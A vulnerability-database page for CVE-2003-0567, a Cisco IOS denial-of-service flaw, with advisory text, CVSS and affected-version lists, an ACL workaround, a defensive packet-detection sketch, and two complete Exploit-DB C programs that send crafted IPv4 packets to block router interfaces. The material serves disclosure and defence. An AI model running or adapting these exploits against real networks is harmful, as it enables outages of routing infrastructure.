CVE-2003-0567
CVSS 7.8
Published: 2003-08-18 00:00:00
Last revised: 2009-03-04 00:18:33

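[Original] Cisco IOS 11.x and 12.0 through 12.2 allows remote attackers to cause a denial of service (traffic block) by sending a particular sequence of IPv4 packets to an interface on the device, causing the input queue on that interface to be marked as full.


[CNNVD] Cisco IOS IPv4 Packet Processing Denial of Service Vulnerability (CNNVD-200308-107)


        Cisco IOS is a very widely deployed network operating system. Many Cisco devices run IOS.
        A vulnerability in IOS versions earlier than 12.3 may allow an attacker to carry out a denial-of-service attack against affected devices. The vulnerability affects all Cisco devices that run Cisco IOS software and process IPv4 packets.
        Cisco routers are configured by default to accept and process IPv4 packets. When IPv4 packets with protocol type 53 (SWIPE), 55 (IP Mobility), 77 (Sun ND) or 103 (Protocol Independent Multicast - PIM) are sent to one of the router's interfaces in a particular sequence, the target router incorrectly marks that interface's input queue as full while processing them. The router then stops processing traffic on that interface, including routing protocol packets and ARP packets. The attack triggers no alarms, and the router does not reload automatically. The router must be restarted manually to restore normal operation.
        An attacker can repeat the attack against every interface of the Cisco device, leaving the router unreachable remotely.
        <*Links: http://www.cert.org/advisories/CA-2003-15.html
         http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml
         *>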

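- CVSS (Base Score)

CVSS score: 7.8 [Severe (HIGH)]
Confidentiality impact: NONE [no impact on the confidentiality of the system]
Integrity impact: NONE [no impact on the integrity of the system]
Availability impact: COMPLETE [may bring the system down completely]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: NETWORK [the attacker needs neither intranet access nor local access]
Authentication: NONE [exploitation requires no authentication]

- CWE (Weakness Category)

CWE-20 [Improper Input Validation]

- CPE (Affected Platforms and Products)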

cpe:/o:cisco:ios:12.1ew  Cisco IOS 12.1EW
cpe:/o:cisco:ios:12.2yo  Cisco IOS 12.2YO
cpe:/o:cisco:ios:11.3t  Cisco IOS 11.3T
cpe:/o:cisco:ios:12.1ye  Cisco IOS 12.1YE
cpe:/o:cisco:ios:12.1xv  Cisco IOS 12.1XV
cpe:/o:cisco:ios:12.2xf  Cisco IOS 12.2XF
cpe:/o:cisco:ios:12.0s  Cisco IOS 12.0S
cpe:/o:cisco:ios:12.0sc  Cisco IOS 12.0SC
cpe:/o:cisco:ios:12.0sx  Cisco IOS 12.0SX
cpe:/o:cisco:ios:12.2xe  Cisco IOS 12.2XE
cpe:/o:cisco:ios:12.1m  Cisco IOS 12.1 M
cpe:/o:cisco:ios:12.0sz  Cisco IOS 12.0SZ
cpe:/o:cisco:ios:12.2xd  Cisco IOS 12.2XD
cpe:/o:cisco:ios:12.1t  Cisco IOS 12.1T
cpe:/o:cisco:ios:12.2xh  Cisco IOS 12.2XH
cpe:/o:cisco:ios:12.1xf  Cisco IOS 12.1XF
cpe:/o:cisco:ios:12.2xq  Cisco IOS 12.2XQ
cpe:/o:cisco:ios:12.2yx  Cisco IOS 12.2YX
cpe:/o:cisco:ios:12.1xx  Cisco IOS 12.1XX
cpe:/o:cisco:ios:12.1xl  Cisco IOS 12.1XL
cpe:/o:cisco:ios:12.0xg  Cisco IOS 12.0XG
cpe:/o:cisco:ios:12.1xc  Cisco IOS 12.1XC
cpe:/o:cisco:ios:12.0wt  Cisco IOS 12.0WT
cpe:/o:cisco:ios:12.2mc  Cisco IOS 12.2MC
cpe:/o:cisco:ios:12.1xt  Cisco IOS 12.1XT
cpe:/o:cisco:ios:12.0sl  Cisco IOS 12.0SL
cpe:/o:cisco:ons_15454_optical_transport_platform:3.0
cpe:/o:cisco:ios:12.2yq  Cisco IOS 12.2YQ
cpe:/o:cisco:ios:12.2bz  Cisco IOS 12.2BZ
cpe:/o:cisco:ios:12.1xp  Cisco IOS 12.1XP
cpe:/o:cisco:ios:12.0xw  Cisco IOS 12.0 XW
cpe:/o:cisco:ios:12.2cy  Cisco IOS 12.2CY
cpe:/o:cisco:ios:12.2bw  Cisco IOS 12.2BW
cpe:/o:cisco:ios:12.2yz  Cisco IOS 12.2YZ
cpe:/o:cisco:ios:12.2sz  Cisco IOS 12.2SZ
cpe:/o:cisco:ios:11.1  Cisco IOS 11.1
cpe:/o:cisco:ios:12.2xk  Cisco IOS 12.2XK
cpe:/o:cisco:ios:12.1xs  Cisco IOS 12.1XS
cpe:/o:cisco:ios:12.2yr  Cisco IOS 12.2YR
cpe:/o:cisco:ons_15454_optical_transport_platform:3.1_.0
cpe:/o:cisco:ios:12.1xj  Cisco IOS 12.1XJ
cpe:/o:cisco:ios:12.0xm  Cisco IOS 12.0XM
cpe:/o:cisco:ios:12.0w5  Cisco IOS 12.0W5
cpe:/o:cisco:ios:12.1xz  Cisco IOS 12.1XZ
cpe:/o:cisco:ios:12.2bx  Cisco IOS 12.2BX
cpe:/o:cisco:ios:12.0db  Cisco IOS 12.0DB
cpe:/o:cisco:ios:12.2xm  Cisco IOS 12.2XM
cpe:/o:cisco:ios:12.1xi  Cisco IOS 12.1XI
cpe:/h:cisco:ons_15454_optical_transport_platform
cpe:/o:cisco:ios:12.1ay  Cisco IOS 12.1AY
cpe:/o:cisco:ios:12.1eb  Cisco IOS 12.1EB
cpe:/o:cisco:ios:11.3  Cisco IOS 11.3
cpe:/o:cisco:ios:12.2yv  Cisco IOS 12.2YV
cpe:/o:cisco:ios:12.2ze  Cisco IOS 12.2ZE
cpe:/o:cisco:ios:12.0xl  Cisco IOS 12.0XL
cpe:/o:cisco:ios:12.1xe  Cisco IOS 12.1XE
cpe:/o:cisco:ios:12.2yu  Cisco IOS 12.2YU
cpe:/o:cisco:ios:12.1xd  Cisco IOS 12.1XD
cpe:/o:cisco:ons_15454_optical_transport_platform:4.0
cpe:/o:cisco:ios:12.1ea  Cisco IOS 12.1EA
cpe:/o:cisco:ios:12.2mb  Cisco IOS 12.2MB
cpe:/o:cisco:ios:12.2yy  Cisco IOS 12.2YY
cpe:/o:cisco:ios:12.1da  Cisco IOS 12.1DA
cpe:/o:cisco:ios:12.2zf  Cisco IOS 12.2ZF
cpe:/o:cisco:ios:11.1ca  Cisco IOS 11.1 CA
cpe:/o:cisco:ios:11.0  Cisco IOS 11.0
cpe:/o:cisco:ios:12.0dc  Cisco IOS 12.0DC
cpe:/o:cisco:ios:12.1xa  Cisco IOS 12.1XA
cpe:/o:cisco:ios:12.2yp  Cisco IOS 12.2YP
cpe:/o:cisco:ios:12.2xn  Cisco IOS 12.2XN
cpe:/o:cisco:ios:12.1  Cisco IOS 12.1
cpe:/o:cisco:ios:11.2p  Cisco IOS 11.2P
cpe:/o:cisco:ios:12.0xb  Cisco IOS 12.0XB
cpe:/o:cisco:ios:12.2yn  Cisco IOS 12.2YN
cpe:/o:cisco:ios:12.0xe  Cisco IOS 12.0XE
cpe:/o:cisco:ios:11.1cc  Cisco IOS 11.1CC
cpe:/o:cisco:ios:12.1xk  Cisco IOS 12.1XK
cpe:/o:cisco:ios:12.2xj  Cisco IOS 12.2XJ
cpe:/o:cisco:ios:12.2xa  Cisco IOS 12.2XA
cpe:/o:cisco:ios:12.2mx  Cisco IOS 12.2MX
cpe:/o:cisco:ios:12.2zh  Cisco IOS 12.2ZH
cpe:/o:cisco:ios:12.0xa  Cisco IOS 12.0XA
cpe:/o:cisco:ons_15454_optical_transport_platform:3.4
cpe:/o:cisco:ios:12.2xg  Cisco IOS 12.2XG
cpe:/o:cisco:ios:12.2xu  Cisco IOS 12.2XU
cpe:/o:cisco:ios:12.1xq  Cisco IOS 12.1XQ
cpe:/o:cisco:ios:12.0xc  Cisco IOS 12.0XC
cpe:/o:cisco:ios:12.0t  Cisco IOS 12.0T
cpe:/o:cisco:ios:12.2cx  Cisco IOS 12.2CX
cpe:/o:cisco:ios:12.1yb  Cisco IOS 12.1YB
cpe:/o:cisco:ios:12.2ja  Cisco IOS 12.2JA
cpe:/o:cisco:ios:12.2yd  Cisco IOS 12.2YD
cpe:/o:cisco:ios:12.1ax  Cisco IOS 12.1AX
cpe:/o:cisco:ios:12.2zj  Cisco IOS 12.2ZJ
cpe:/o:cisco:ios:12.0xi  Cisco IOS 12.0XI
cpe:/o:cisco:ios:12.1xr  Cisco IOS 12.1XR
cpe:/o:cisco:ios:12.2xt  Cisco IOS 12.2XT
cpe:/o:cisco:ios:12.1ev  Cisco IOS 12.1EV
cpe:/o:cisco:ios:12.2yt  Cisco IOS 12.2YT
cpe:/o:cisco:ios:12.2xb  Cisco IOS 12.2XB
cpe:/o:cisco:ios:12.0  Cisco IOS 12.0
cpe:/o:cisco:ios:12.1xw  Cisco IOS 12.1XW
cpe:/o:cisco:ios:12.1yh  Cisco IOS 12.1YH
cpe:/o:cisco:ios:12.2yw  Cisco IOS 12.2YW
cpe:/o:cisco:ios:12.0xr  Cisco IOS 12.0XR
cpe:/o:cisco:ios:12.2za  Cisco IOS 12.2ZA
cpe:/o:cisco:ios:12.2yb  Cisco IOS 12.2YB
cpe:/o:cisco:ios:11.1aa  Cisco IOS 11.1 AA
cpe:/o:cisco:ios:12.2bc  Cisco IOS 12.2BC
cpe:/o:cisco:ios:12.1xb  Cisco IOS 12.1XB
cpe:/o:cisco:ios:12.0xp  Cisco IOS 12.0XP
cpe:/o:cisco:ios:12.1xg  Cisco IOS 12.1XG
cpe:/o:cisco:ios:12.2yh  Cisco IOS 12.2YH
cpe:/o:cisco:ios:12.2  Cisco IOS 12.2
cpe:/o:cisco:ios:12.0xs  Cisco IOS 12.0XS
cpe:/o:cisco:ios:12.1yd  Cisco IOS 12.1YD
cpe:/o:cisco:ios:12.2xw  Cisco IOS 12.2XW
cpe:/o:cisco:ios:12.2xr  Cisco IOS 12.2XR
cpe:/o:cisco:ios:12.2xi  Cisco IOS 12.2XI
cpe:/o:cisco:ios:12.2ya  Cisco IOS 12.2YA
cpe:/o:cisco:ons_15454_optical_transport_platform:3.2_.0
cpe:/o:cisco:ios:12.2zb  Cisco IOS 12.2ZB
cpe:/o:cisco:ios:12.2da  Cisco IOS 12.2DA
cpe:/o:cisco:ios:12.2yg  Cisco IOS 12.2YG
cpe:/o:cisco:ios:12.2zg  Cisco IOS 12.2ZG
cpe:/o:cisco:ios:12.2ym  Cisco IOS 12.2YM
cpe:/o:cisco:ios:12.2yf  Cisco IOS 12.2YF
cpe:/o:cisco:ios:12.1xu  Cisco IOS 12.1XU
cpe:/o:cisco:ios:12.0xj  Cisco IOS 12.0XJ
cpe:/o:cisco:ios:11.2sa  Cisco IOS 11.2 SA
cpe:/o:cisco:ios:12.0st  Cisco IOS 12.0ST
cpe:/o:cisco:ios:12.2ys  Cisco IOS 12.2YS
cpe:/o:cisco:ios:12.1yj  Cisco IOS 12.1YJ
cpe:/o:cisco:ios:12.2yj  Cisco IOS 12.2YJ
cpe:/o:cisco:ios:12.2b  Cisco IOS 12.2B
cpe:/o:cisco:ios:12.1yc  Cisco IOS 12.1YC
cpe:/o:cisco:ios:12.0xu  Cisco IOS 12.0XU
cpe:/o:cisco:ios:12.2xc  Cisco IOS 12.2XC
cpe:/o:cisco:ios:12.1yi  Cisco IOS 12.1YI
cpe:/o:cisco:ios:12.0sy  Cisco IOS 12.0SY
cpe:/o:cisco:ios:12.1ey  Cisco IOS 12.1EY
cpe:/o:cisco:ons_15454_optical_transport_platform:3.3
cpe:/o:cisco:ios:12.2sx  Cisco IOS 12.2SX
cpe:/o:cisco:ios:12.2yc  Cisco IOS 12.2YC
cpe:/o:cisco:ios:12.1aa  Cisco IOS 12.1AA
cpe:/o:cisco:ios:12.2yl  Cisco IOS 12.2YL
cpe:/o:cisco:ios:12.1db  Cisco IOS 12.1DB
cpe:/o:cisco:ios:12.2xs  Cisco IOS 12.2XS
cpe:/o:cisco:ios:12.2dd  Cisco IOS 12.2DD
cpe:/o:cisco:ios:12.0xq  Cisco IOS 12.0XQ
cpe:/o:cisco:ios:12.0xd  Cisco IOS 12.0XD
cpe:/o:cisco:ios:12.1yf  Cisco IOS 12.1YF
cpe:/o:cisco:ios:12.2zd  Cisco IOS 12.2ZD
cpe:/o:cisco:ios:12.0wc  Cisco IOS 12.0WC
cpe:/o:cisco:ios:12.1ec  Cisco IOS 12.1EC
cpe:/o:cisco:ios:12.0xk  Cisco IOS 12.0XK
cpe:/o:cisco:ios:11.2  Cisco IOS 11.2
cpe:/o:cisco:ios:12.1e  Cisco IOS 12.1E
cpe:/o:cisco:ios:12.0da  Cisco IOS 12.0DA
cpe:/o:cisco:ios:12.1ex  Cisco IOS 12.1EX
cpe:/o:cisco:ios:12.0sp  Cisco IOS 12.0SP
cpe:/o:cisco:ios:12.0xh  Cisco IOS 12.0XH
cpe:/o:cisco:ios:12.0xv  Cisco IOS 12.0Xv
cpe:/o:cisco:ios:12.2zc  Cisco IOS 12.2ZC
cpe:/o:cisco:ios:12.0xf  Cisco IOS 12.0XF
cpe:/o:cisco:ios:12.2s  Cisco IOS 12.2S
cpe:/o:cisco:ios:12.2sy  Cisco IOS 12.2SY
cpe:/o:cisco:ios:12.1xh  Cisco IOS 12.1XH
cpe:/o:cisco:ios:12.1xy  Cisco IOS 12.1XY
cpe:/o:cisco:ios:12.2yk  Cisco IOS 12.2YK
cpe:/o:cisco:ios:12.2dx  Cisco IOS 12.2DX
cpe:/o:cisco:ios:12.0xn  Cisco IOS 12.0XN
cpe:/o:cisco:ios:12.1dc  Cisco IOS 12.1DC
cpe:/o:cisco:ios:12.2xl  Cisco IOS 12.2XL
cpe:/o:cisco:ios:12.2t  Cisco IOS 12.2T
cpe:/o:cisco:ios:12.1xm  Cisco IOS 12.1XM

- OVAL (Technical Details for Detection)

oval:org.mitre.oval:def:5603  Cisco Systems IOS 11.x/12.x DoS Vulnerability
*OVAL describes in detail how to detect this vulnerability; you can find more technical details on detecting it in the related OVAL definition.

- Official Database Links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2003-0567
(Official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2003-0567
(Official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200308-107
(Official data source) CNNVD

- Other Links and Resources

http://www.cert.org/advisories/CA-2003-17.html
(VENDOR_ADVISORY)  CERT  CA-2003-17
http://www.cert.org/advisories/CA-2003-15.html
(VENDOR_ADVISORY)  CERT  CA-2003-15
http://www.kb.cert.org/vuls/id/411332
(UNKNOWN)  CERT-VN  VU#411332
http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml
(UNKNOWN)  CISCO  20030717 IOS Interface Blocked by IPv4 Packet
http://lists.grok.org.uk/pipermail/full-disclosure/2003-July/006743.html
(UNKNOWN)  FULLDISC  20030718 (no subject)

- Vulnerability Information

Cisco IOS IPv4 Packet Processing Denial of Service Vulnerability
High risk  Input validation
2003-08-18 00:00:00 2009-03-04 00:00:00
Remote

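- Advisories and Patches

        Workaround:
        If you cannot install the patch or upgrade immediately, CNNVD recommends the following measures to reduce the threat:
        * On the router, use access control lists (ACLs) to filter traffic sent from unauthorized addresses directly to the router's own addresses.
         Access control lists can affect performance; choose a suitable access control list carefully, based on your actual environment.
         You can refer to the following Cisco documents for configuration:

        http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml#workarounds


        http://www.cisco.com/warp/public/707/racl.html


        http://www.cisco.com/warp/public/707/iacl.html

         Cisco also provides a sample ACL that blocks all packets with protocol types 53, 55, 77 and 103 from passing through the router: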
         access-list 101 deny 53 any any
         access-list 101 deny 55 any any
         access-list 101 deny 77 any any
         access-list 101 deny 103 any any
         !--- insert any other previously applied ACL entries here
         !--- you must permit other protocols through to allow normal
         !--- traffic -- previously defined permit lists will work
         !--- or you may use the permit ip any any shown here
         access-list 101 permit ip any any
        Vendor patch:
        Cisco
        -----
        Cisco has released a security advisory (cisco-sa-20030717-blocked) and corresponding patches for this issue:
        cisco-sa-20030717-blocked: Cisco Security Advisory: Cisco IOS Interface Blocked by IPv4 Packet
        Link:
        http://www.cisco.com/warp/public/707/cisco-sa-20030717-blocked.shtml

        You can download upgrades from the software center on the Cisco website:

        http://www.cisco.com/tacpage/sw-center/sw-ios.shtml

        or contact your reseller to upgrade.
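
The match performed by the sample ACL above, written as sensor-side detection logic (an added example, not code from Cisco, CNNVD or the exploit authors): it parses a captured IPv4 header and raises an alert when one of the four protocol numbers is addressed to an address on a router-interface list. The interface addresses and sample packets are constructed, and `classify_ipv4` and the verdict names are hypothetical.

```c
#include <stddef.h>
#include <stdint.h>
#include <stdio.h>

/* IP protocol numbers denied by the sample ACL: SWIPE, IP Mobility, Sun ND, PIM. */
static const uint8_t WATCHED_PROTOCOLS[] = { 53, 55, 77, 103 };

/* Hypothetical router interface addresses (documentation ranges), host byte order. */
static const uint32_t ROUTER_ADDRS[] = {
    0xC0000201u, /* 192.0.2.1 */
    0xC6336401u  /* 198.51.100.1 */
};

enum verdict {
    PKT_IGNORE = 0, /* protocol is not one of the four */
    PKT_MALFORMED,  /* cannot be parsed as an IPv4 header */
    PKT_OTHER_DST,  /* watched protocol, destination is not a listed router address */
    PKT_ALERT       /* watched protocol addressed to a listed router interface */
};

struct ipv4_info {
    uint8_t protocol;
    uint8_t ttl;
    uint32_t src; /* host byte order */
    uint32_t dst; /* host byte order */
};

static uint32_t be32(const uint8_t *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) |
           ((uint32_t)p[2] << 8) | (uint32_t)p[3];
}

static int is_watched(uint8_t proto)
{
    for (size_t i = 0; i < sizeof WATCHED_PROTOCOLS / sizeof WATCHED_PROTOCOLS[0]; i++)
        if (WATCHED_PROTOCOLS[i] == proto)
            return 1;
    return 0;
}

static int is_router_addr(uint32_t addr)
{
    for (size_t i = 0; i < sizeof ROUTER_ADDRS / sizeof ROUTER_ADDRS[0]; i++)
        if (ROUTER_ADDRS[i] == addr)
            return 1;
    return 0;
}

/* Parse one captured IPv4 packet and classify it; *out is filled unless malformed. */
enum verdict classify_ipv4(const uint8_t *pkt, size_t len, struct ipv4_info *out)
{
    if (pkt == NULL || out == NULL || len < 20 || (pkt[0] >> 4) != 4)
        return PKT_MALFORMED;
    size_t ihl = (size_t)(pkt[0] & 0x0F) * 4;      /* header length in bytes */
    size_t total = ((size_t)pkt[2] << 8) | pkt[3]; /* total-length field */
    if (ihl < 20 || ihl > len || total < ihl || total > len)
        return PKT_MALFORMED;
    out->ttl = pkt[8];
    out->protocol = pkt[9];
    out->src = be32(pkt + 12);
    out->dst = be32(pkt + 16);
    if (!is_watched(out->protocol))
        return PKT_IGNORE;
    return is_router_addr(out->dst) ? PKT_ALERT : PKT_OTHER_DST;
}

/* Constructed headers; checksum field left zero because this sketch does not verify it. */
static const uint8_t SAMPLE_SWIPE_TO_ROUTER[] = { /* proto 53, 203.0.113.7 -> 192.0.2.1 */
    0x45,0x00,0x00,0x14, 0x00,0x01,0x00,0x00, 0x01,0x35,0x00,0x00,
    0xCB,0x00,0x71,0x07, 0xC0,0x00,0x02,0x01 };
static const uint8_t SAMPLE_PIM_HELLO[] = {       /* proto 103, 192.0.2.2 -> 224.0.0.13 */
    0x45,0xC0,0x00,0x14, 0x00,0x02,0x00,0x00, 0x01,0x67,0x00,0x00,
    0xC0,0x00,0x02,0x02, 0xE0,0x00,0x00,0x0D };
static const uint8_t SAMPLE_TCP_TO_ROUTER[] = {   /* proto 6, 203.0.113.7 -> 192.0.2.1 */
    0x45,0x00,0x00,0x14, 0x00,0x03,0x00,0x00, 0x40,0x06,0x00,0x00,
    0xCB,0x00,0x71,0x07, 0xC0,0x00,0x02,0x01 };
static const uint8_t SAMPLE_SUNND_TO_ROUTER[] = { /* proto 77, 203.0.113.9 -> 198.51.100.1 */
    0x45,0x00,0x00,0x14, 0x00,0x04,0x00,0x00, 0x01,0x4D,0x00,0x00,
    0xCB,0x00,0x71,0x09, 0xC6,0x33,0x64,0x01 };

int main(void)
{
    static const struct { const char *name; const uint8_t *data; size_t len; } samples[] = {
        { "swipe->router", SAMPLE_SWIPE_TO_ROUTER, sizeof SAMPLE_SWIPE_TO_ROUTER },
        { "pim-hello",     SAMPLE_PIM_HELLO,       sizeof SAMPLE_PIM_HELLO },
        { "tcp->router",   SAMPLE_TCP_TO_ROUTER,   sizeof SAMPLE_TCP_TO_ROUTER },
        { "sun-nd->router", SAMPLE_SUNND_TO_ROUTER, sizeof SAMPLE_SUNND_TO_ROUTER },
        { "truncated",     SAMPLE_SWIPE_TO_ROUTER, 10 },
    };
    static const char *labels[] = { "ignore", "malformed", "other-dst", "ALERT" };
    for (size_t i = 0; i < sizeof samples / sizeof samples[0]; i++) {
        struct ipv4_info info = { 0, 0, 0, 0 };
        enum verdict v = classify_ipv4(samples[i].data, samples[i].len, &info);
        printf("%-15s proto=%3u ttl=%3u -> %s\n", samples[i].name,
               (unsigned)info.protocol, (unsigned)info.ttl, labels[v]);
    }
    return 0;
}
```

The PIM hello sample lands in `PKT_OTHER_DST` rather than `PKT_ALERT`, which separates multicast PIM traffic from protocol-103 packets sent to a router's own unicast address.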

- Vulnerability Information (59)

Cisco IOS IPv4 Packets Denial of Service Exploit (EDBID:59)
hardware dos
2003-07-18 Verified
0 l0cK
N/A
/*
* ShadowChode - Cisco IOS IPv4 Packet Processing Denial of Service Exploit
*
* Ping target router/switch for TTL to host. Subtract that number from 255
* and use that TTL on the command line. The TTL must equal 0 or 1 when it
* reaches the target. The target must accept packets to the given target
* interface address and there are some other caveats.
*
* BROUGHT TO YOU BY THE LETTERS C AND D
*
* [L0cK]
*/

#include <stdio.h>
#include <sys/types.h>

#include "libnet.h"

#define MIN_PAYLOAD_LEN (26)

#define CLEANUP { \
libnet_destroy(lh); \
free(payload); \
}

int
main(int argc, char *argv[])
{
char errbuf[LIBNET_ERRBUF_SIZE];
libnet_t *lh;
u_long dst_addr;
int ttl;
int payload_len;
char *payload;
libnet_ptag_t data_tag;
libnet_ptag_t ip_tag;
int i;
int len;
int protocols[] = { 53, 55, 77, 103 };
struct libnet_stats ls;

lh = libnet_init(LIBNET_RAW4, NULL, errbuf);

if (lh == NULL) {
(void) fprintf(stderr, "libnet_init() failed: %s\n", errbuf);
exit(-1);
}

if (argc != 3 || (dst_addr = libnet_name2addr4(lh, argv[1], LIBNET_RESOLVE) == -1)) {
(void) fprintf(stderr, "Usage: %s <target> <ttl>\n", argv[0]);
libnet_destroy(lh);
exit(-1);
}

{ /* OH WAIT, ROUTE'S RESOLVER DOESN'T WORK! */
struct in_addr dst;

if (!inet_aton(argv[1], &dst)) {
perror("inet_aton");
libnet_destroy(lh);
exit(-1);
}

dst_addr = dst.s_addr;
}

ttl = atoi(argv[2]);

libnet_seed_prand(lh);

len = libnet_get_prand(LIBNET_PR8);

/* Mmmmm, suck up random amount of memory! */

payload_len = (MIN_PAYLOAD_LEN > len) ? MIN_PAYLOAD_LEN : len;

payload = (char *) malloc(payload_len);

if (payload == NULL) {
perror("malloc");
libnet_destroy(lh);
exit(-1);
}

for (i = 0; i < payload_len; i++) {
payload[i] = i;
}

data_tag = LIBNET_PTAG_INITIALIZER;

data_tag = libnet_build_data(payload, payload_len, lh, data_tag);

if (data_tag == -1) {
(void) fprintf(stderr, "Can't build data block: %s\n", libnet_geterror(lh));
CLEANUP;
exit(-1);
}

ip_tag = LIBNET_PTAG_INITIALIZER;

for (i = 0; i < 4; i++) {
ip_tag = libnet_build_ipv4(LIBNET_IPV4_H + payload_len, 0, libnet_get_prand(LIBNET_PRu16),
 0, ttl, protocols[i], 0, libnet_get_prand(LIBNET_PRu32), dst_addr, NULL, 0, lh, ip_tag);

if (ip_tag == -1) {
(void) fprintf(stderr, "Can't build IP header: %s\n", libnet_geterror(lh));
CLEANUP;
exit(-1);
}

len = libnet_write(lh);

if (len == -1) {
(void) fprintf(stderr, "Write error: %s\n", libnet_geterror(lh));
}
}

libnet_stats(lh, &ls);

(void) fprintf(stderr, "Packets sent: %ld\n"
"Packet errors: %ld\n"
"Bytes written: %ld\n",
ls.packets_sent, ls.packet_errors, ls.bytes_written);

CLEANUP;

return (0);
}

// milw0rm.com [2003-07-18]
		

- Vulnerability Information (60)

Cisco IOS IPv4 Packet Denial of Service Exploit (cisco-bug-44020.c) (EDBID:60)
hardware dos
2003-07-21 Verified
0 Martin Kluge
N/A
/*******************************************************/
/* cisco-bug-44020.c - Copyright by Martin Kluge (martin@elxsi.de) */
/*                                                                                            */
/* Feel free to modify this code as you like, as long as you include */
/* the above copyright statement.                                               */
/*                                                                                            */
/* Please use this code only to check your OWN cisco routers.         */
/*                                                                                            */
/*                                                                                            */
/* This exploit uses the bug in recent IOS versions to stop router    */
/* from processing traffic once the input queue is full.                    */
/*                                                                                            */
/*                                                                                            */
/* Use access control lists as described in the CISCO advisory to     */
/* protect your cisco routers:                                                       */
/*                                                                                            */
/* access-list 101 deny 53 any any                                              */
/* access-list 101 deny 55 any any                                              */
/* access-list 101 deny 77 any any                                              */
/* access-list 101 deny 103 any any                                            */
/*                                                                                            */
/* This code was only tested on linux, no warranty is or will be        */
/*                                                                                            */
/* Usage: ./cisco-bug-44020 <src ip> <dst ip> <hops> <number>  */
/* Source IP: Your source IP (or a spoofed source IP)                    */
/* Destination IP: The IP of the vulnerable cisco router                  */
/* Hops: The number of hops between you and the router,             */
/* the time to live (ttl) should be 0 when the packet                      */
/* is received by the cisco router.                                                 */
/* Number: Number of packets to send (0 = loop)                         */
/* provided.                                                                              */
/*******************************************************/

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <unistd.h>

#include <arpa/inet.h>
#include <netinet/in.h>

#include <sys/time.h>
#include <sys/types.h>
#include <sys/socket.h>

#define DEBUG

#ifndef IPPROTO_RAW
#define IPPROTO_RAW 0
#endif

/* IPv4 header */
struct ipv4_pkt_header {
unsigned int ipvhl:8; /* Version + Header length */
unsigned int type_service:8; /* TOS(Type of Service) field */
unsigned short packet_len; /* Header+Payload length */
unsigned short ident; /* Identification field */
unsigned short fragment; /* Fragment Offset field */
unsigned int time_live:8; /* TTL(Time to Live) field */
unsigned int protocol:8; /* Protocol field */
unsigned short sum; /* Checksum field */
struct in_addr src_ip; /* Source IP */
struct in_addr dst_ip; /* Destination IP */
};


char proto[] = {53,55,77,103};


/* Prototypes */
int in_cksum (unsigned short *, int, int);


/* Main function */
int main (int argc, char *argv[]) {
struct ipv4_pkt_header ipv4_hdr;
struct sockaddr_in sin;
struct timeval seed;

unsigned long src_ip, dst_ip;
int fd, hops, count, bytes;
int len=0, i=0, n=0, loop=0;

unsigned char *buf;

/* Check command line args */ 
if(argc != 5) {
fprintf(stderr, "Usage: %s <src ip> <dst ip> <hops> <number>\n\n", argv[0]);
return(EXIT_FAILURE);
}

src_ip = inet_addr(argv[1]);
dst_ip = inet_addr(argv[2]);
hops = atoi(argv[3]);
count = atoi(argv[4]);

if(count == 0) { loop=1; count=1; }

#ifdef DEBUG
printf("DEBUG: Hops: %i\n", hops);
#endif

/* Open a raw socket */
if((fd = socket(AF_INET, SOCK_RAW, IPPROTO_RAW)) == -1) {
fprintf(stderr, "Error: Cannot open raw socket.\n");
return(EXIT_FAILURE);
}

/* Build the IPv4 header */
ipv4_hdr.ipvhl = ((4 << 4) | 0x0f) & (5 | 0xf0); /* :) */
ipv4_hdr.type_service = 0x10;

#ifdef OSTYPE_BSD
ipv4_hdr.packet_len = 0x14 + len;
ipv4_hdr.fragment = 0x4000;
#else
ipv4_hdr.packet_len = htons(0x14 + len);
ipv4_hdr.fragment = htons(0x4000);
#endif

ipv4_hdr.time_live = hops;
ipv4_hdr.src_ip.s_addr = src_ip;
ipv4_hdr.dst_ip.s_addr = dst_ip;

while(n < count) {
/* Seed the random generator */
if(gettimeofday(&seed, NULL) == -1) {
fprintf(stderr, "Error: Cannot seed the random generator.\n");
return(EXIT_FAILURE);
}

srandom((unsigned int) (seed.tv_sec ^ seed.tv_usec));

ipv4_hdr.protocol = proto[random() % 0x4];

#ifdef DEBUG
printf("DEBUG: Protocol: %i\n", ipv4_hdr.protocol);
#endif

ipv4_hdr.ident = htons(random() % 0x7fff);

/* Calculate checksum */
ipv4_hdr.sum = 0x0000;
ipv4_hdr.sum = in_cksum((unsigned short *) &ipv4_hdr, 0x14 + len, 0);

#ifdef DEBUG
printf("DEBUG: Checksum: %i\n", ipv4_hdr.sum);
#endif

buf = malloc(0x14 + len);
memset(buf, '\0', 0x14 + len);

memcpy((unsigned char *) buf, (unsigned char *) &ipv4_hdr,
0x14 + len);

#ifdef DEBUG
printf("DEBUG: ");
for(i=0; i < 0x14 + len; i++)
printf(" %02x", buf[i]);
printf("\n");
#endif


memset(&sin, '\0', sizeof(struct sockaddr_in));
sin.sin_family = AF_INET;
sin.sin_addr.s_addr = dst_ip;

bytes = sendto(fd, buf, 0x14 + len, 0, (struct sockaddr *) &sin,
sizeof(struct sockaddr));

#ifdef DEBUG
printf("DEBUG: Wrote %i bytes.\n", bytes);
#endif

if(loop != 1) n++;

free(buf);
}

close(fd);
return(EXIT_SUCCESS);
}


int in_cksum(unsigned short *addr, int len, int csum) {
register int sum = csum;
unsigned short answer = 0;
register unsigned short *w = addr;
register int nleft = len;

/*
* Our algorithm is simple, using a 32 bit accumulator (sum), we add
* sequential 16 bit words to it, and at the end, fold back all the
* carry bits from the top 16 bits into the lower 16 bits.
*/
while (nleft > 1) {
sum += *w++;
nleft -= 2;
}

/* mop up an odd byte, if necessary */
if (nleft == 1) {
sum += htons(*(unsigned char *)w<<8);
}
/* add back carry outs from top 16 bits to low 16 bits */
sum = (sum >> 16) + (sum & 0xffff); /* add hi 16 to low 16 */
sum += (sum >> 16); /* add carry */
answer = ~sum; /* truncate to 16 bits */
return(answer);
}


// milw0rm.com [2003-07-21]
		

- Vulnerability Information (62)

Cisco IOS (using hping) Remote Denial of Service Exploit (EDBID:62)
hardware dos
2003-07-22 Verified
0 zerash
N/A
